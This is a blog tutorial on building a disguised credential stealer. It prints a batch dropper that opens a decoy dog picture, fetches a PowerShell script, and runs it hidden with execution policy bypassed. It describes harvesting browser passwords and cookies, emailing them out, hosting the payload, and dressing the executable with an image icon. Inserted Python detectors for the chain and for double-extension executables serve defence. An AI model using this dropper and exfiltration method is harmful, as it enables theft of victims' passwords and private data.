Hack anyone with just an “Image”

0xdom
Published in Nerd For Tech
4 min read, Aug 11, 2022

So a few days ago my friend showed me a script he had made that he was calling ransomware, but it was a batch script that just renames files to random extensions so the system no longer recognizes them; clicking the "decrypter" batch file reverts the files to their original extensions. Overall this project was pretty awesome because it introduced me to the amazing world of batch scripting, but I sure wouldn't call this script ransomware, lol.

As my interest in batch scripting grew, I started reading a lot of blogs on batch scripting and ways to hack with it, and soon I stumbled upon an awesome PowerShell scripting guide by samratashok called Nishang.

I've tried building this script: software that, when executed, steals all the browser cookies, passwords, history and other useful data from the victim and sends that data to an email address you configure. I'll explain how the code works as we go through this tutorial.

Batch script

Here's the batch file; this is the script we want to execute on the victim's PC.

pushd %temp%
powershell Invoke-WebRequest "https://static.onecms.io/wp-content/uploads/sites/24/2021/04/26/GettyImages-185743593-2000.jpg" -Outfile "doggy.jpg"
doggy.jpg
powershell Invoke-WebRequest -Uri <site hosting your powershell script> -OutFile .\power.ps1; start PowerShell -windowstyle hidden -NoProfile -ExecutionPolicy Bypass -file "power.ps1"

Code explanation:

pushd changes the working directory to %temp%, a directory every user can write to, so the downloads below need no special permissions. It does not reduce traces: doggy.jpg and power.ps1 stay in the temp folder after execution and are exactly what a responder will look for first.

The 2nd line downloads a dog picture from the internet and saves it as doggy.jpg.

The 3rd line opens the downloaded image with whatever viewer is associated with .jpg, so the victim sees a picture and assumes that is all that happened.

The 4th line downloads the real payload, the PowerShell script, saves it as power.ps1 and then starts it; we'll look at what that script does later.

The script is started with a few switches:

-WindowStyle Hidden runs the PowerShell process without a visible window.

-NoProfile skips loading the user's PowerShell profile scripts, so nothing in a profile can slow the script down, interfere with it, or log it. It has nothing to do with administrator rights: the script runs with the privileges of the user who opened the file, no more.

-ExecutionPolicy Bypass sets the execution policy for this process only, which overrides the user and machine registry settings (but not a policy enforced through Group Policy). Execution policy was never designed as a security boundary: it only governs script files, not commands passed on the command line, and Microsoft documents it as a safeguard against running scripts by accident. That is why a per-process override like this works, and why defenders should log and alert on the switch rather than rely on the policy.

-File gives the path of the script to run.
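The switches above are also what makes this chain easy to spot in process telemetry. The following added example (mine, not from the post or the HWI project) scores constructed process-creation records of the kind a parsed Sysmon Event ID 1 or EDR feed provides and flags the cmd.exe to powershell.exe to hidden powershell.exe chain. The field names, paths and URL in the sample events are assumptions for illustration, not captured data.

```python
"""Flag the cmd.exe -> powershell.exe dropper chain described above.

Added example, not the post's own code. It runs over constructed
process-creation records (parent image, image, command line, working
directory); the shape mirrors a parsed Sysmon Event ID 1 but is assumed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    current_directory: str


# PowerShell accepts any unambiguous prefix of a switch name, so match the
# prefix rather than the full spelling (-w hidden, -ep bypass, -nop ...).
SWITCHES = {
    "hidden window": re.compile(r"-w[a-z]*\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e[a-z]*\s+bypass", re.I),
    "profile suppressed": re.compile(r"-nop[a-z]*\b", re.I),
}
DOWNLOAD_CRADLE = re.compile(
    r"\b(Invoke-WebRequest|iwr|wget|curl|DownloadFile|DownloadString|Net\.WebClient)\b",
    re.I)
TEMP_DIR = re.compile(r"(%temp%|\$env:temp|\\AppData\\Local\\Temp)", re.I)
# Parents that should rarely be spawning PowerShell on a workstation.
SCRIPT_HOST_PARENTS = ("cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                       "winword.exe", "excel.exe", "outlook.exe", "powershell.exe")
ALERT_THRESHOLD = 3


def score_event(ev):
    """Return (score, reasons) for one event; (0, []) for non-PowerShell images."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    hits = []  # (label, weight)
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if parent in SCRIPT_HOST_PARENTS:
        hits.append(("spawned by " + parent, 1))
    for label, pattern in SWITCHES.items():
        if pattern.search(ev.command_line):
            hits.append((label, 1))
    if DOWNLOAD_CRADLE.search(ev.command_line):
        hits.append(("download cradle", 2))  # fetching code is the strongest signal
    if TEMP_DIR.search(ev.command_line) or TEMP_DIR.search(ev.current_directory):
        hits.append(("temp directory", 1))
    return sum(w for _, w in hits), [label for label, _ in hits]


def find_droppers(events):
    """Return [(index, score, reasons)] for events at or above the threshold."""
    out = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            out.append((i, score, reasons))
    return out


# Constructed sample telemetry (assumed paths and a placeholder URL).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    # Stage 1: the batch file fetches the decoy image from %temp%.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS_EXE,
                 'powershell Invoke-WebRequest "https://example.invalid/doggy.jpg" -Outfile "doggy.jpg"',
                 TEMP),
    # Stage 2: the fetched script is started hidden, without profile, policy bypassed.
    ProcessEvent(PS_EXE, PS_EXE,
                 'PowerShell -windowstyle hidden -NoProfile -ExecutionPolicy Bypass -file "power.ps1"',
                 TEMP),
    # Benign: an administrator running a maintenance script from Explorer.
    ProcessEvent(r"C:\Windows\explorer.exe", PS_EXE,
                 r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1", r"C:\Scripts"),
    # Benign: not PowerShell at all.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\ping.exe",
                 "ping 10.0.0.1", r"C:\Users\alice"),
]

if __name__ == "__main__":
    for index, score, reasons in find_droppers(SAMPLE_EVENTS):
        print(f"event {index}: score {score}: {', '.join(reasons)}")
```

Only the two stages of the chain cross the threshold; the administrator's -NoProfile run scores a single point, which is the reason the check weights the download cradle and combines signals instead of alerting on any one switch.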

PowerShell script

The script is hosted on GitHub (linked at the end). What it does is download the hackbrowser tool from my venom project; hackbrowser is an open-source tool by some security researchers that extracts saved passwords and other data from almost all browsers, a small program that does the job perfectly. I tried the NirSoft tools first, but their latest update doesn't write the passwords to a text file, which is why I switched to hackbrowser.

The second part of the script sends the results by email, so you need to put a mailbox address and its password into the PowerShell script (an Outlook account is the easiest option). Note what that means: the password sits in clear text inside power.ps1, and power.ps1 is downloaded onto the victim's machine, so anyone who recovers the script from that machine or from the hosting site also gets the mailbox.

If every dependency is in place, the script extracts the passwords and data from almost all browsers, packs the output into a zip file and sends it to the email address set in the script.

Hosting the PowerShell script

This is two-stage malware: the first stage is the batch file being executed on the victim's PC, and the second stage is the PowerShell script it fetches to carry out the rest of the attack.

That is why the PowerShell script has to be hosted somewhere. You can host it on your own computer, but imagine the victim clicking the payload in the middle of the night or two or three days later; we can't risk the script being unavailable, can we? So host it somewhere that is up 24/7. GitHub is an option, but I wouldn't advise it, so I'll leave that decision to you.

Once everything is up and running, put the URL of the PowerShell script into the batch file and convert the batch file to an executable. After tweaking a few options and changing its icon to an image icon, you're good to go. If you have suggestions for making it stealthier, try them and let me know.
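The last step relies on the user seeing an image icon and, since Windows hides known extensions by default, a name like doggy.jpg rather than doggy.jpg.exe. As an added example (mine, not code from the post or the HWI project), the check below reads the bytes instead of trusting the name: it validates the MZ/PE header and reports a mismatch when an image-named file is really a PE. The sample headers are constructed inline. It does not inspect the icon resource, which lives inside the PE and is where the fake image icon is stored.

```python
"""Check whether a file that looks like an image is really a Windows executable.

Added example, not the post's own code. The sample bytes are constructed:
a minimal DOS/PE header and the leading bytes of a JPEG.
"""
import struct

JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def is_pe(data):
    """True if data starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 64 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # offset of the PE signature
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff(data):
    """Classify content by magic bytes; PE is tested first because it is the case that matters."""
    if is_pe(data):
        return "pe"
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    if data.startswith(PNG_MAGIC):
        return "png"
    return "unknown"


def is_disguised_executable(filename, data):
    """True when any suffix of the name reads as an image but the bytes are a PE.

    Windows acts on the final extension, so 'doggy.jpg.exe' is run as a program
    while the file browser, with extensions hidden, shows it as 'doggy.jpg'.
    """
    parts = filename.lower().split(".")
    looks_like_image = any("." + p in IMAGE_EXTENSIONS for p in parts[1:])
    return looks_like_image and sniff(data) == "pe"


def build_minimal_pe():
    """Constructed sample: 64-byte DOS header with e_lfanew = 0x40, then 'PE\\0\\0'."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    samples = {
        "doggy.jpg.exe": build_minimal_pe(),          # the disguised dropper
        "doggy.jpg": JPEG_MAGIC + b"\xe0\x00\x10JFIF",  # a real image
        "setup.exe": build_minimal_pe(),              # honest executable
    }
    for name, content in samples.items():
        print(f"{name}: {sniff(content)}, disguised={is_disguised_executable(name, content)}")
```

Run this over an attachment or download directory and it catches the double-extension variant regardless of the icon; an executable that is honestly named setup.exe passes, because the name promises nothing it does not deliver.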

project: https://github.com/Real0xdom/HWI

Disclaimer: use this information for educational purposes only. I do not encourage you to do anything silly!

Thanks for reading, Have a great rest of your day.


I'm a cybersecurity aspirant currently working on my skills, wannabe hacker.